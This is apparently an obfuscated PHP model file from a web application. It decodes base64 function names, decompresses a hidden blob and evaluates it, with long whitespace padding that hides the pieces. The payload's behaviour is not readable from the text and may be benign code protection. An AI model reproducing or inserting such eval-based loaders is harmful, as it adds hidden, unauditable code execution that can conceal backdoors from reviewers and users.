<?php 
        $__='printf';$_='Loading donjo-app/models/Cdesa_model.php';
        



































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


































































































































































































































                                                                                                                                                                                                                     $________;
